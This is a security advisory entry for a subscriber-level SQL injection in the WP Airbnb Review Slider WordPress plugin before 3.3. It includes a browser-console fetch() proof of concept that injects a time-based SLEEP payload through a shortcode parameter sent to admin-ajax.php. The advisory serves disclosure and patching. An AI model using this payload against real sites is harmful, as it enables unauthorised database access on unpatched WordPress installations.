WP Airbnb Review Slider < 3.3 - Subscriber+ SQLi

2023-01-2300:00:00

Lana Codes

164

wordpress

sql injection

security exploit

0.001 Low

EPSS

Percentile

31.3%

JSON

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber.

Run the following code in the browser console on any WP Admin page.

fetch('/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=parse-media-shortcode&shortcode=[wpairbnb_usetemplate tid="1 AND (SELECT 42 FROM (SELECT(SLEEP(5)))b)"]'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

0.001 Low

EPSS

Percentile

31.3%

JSON

Related for WPEX-ID:5D8C28AC-A46C-45D3-ACC9-2CD2E6356BA2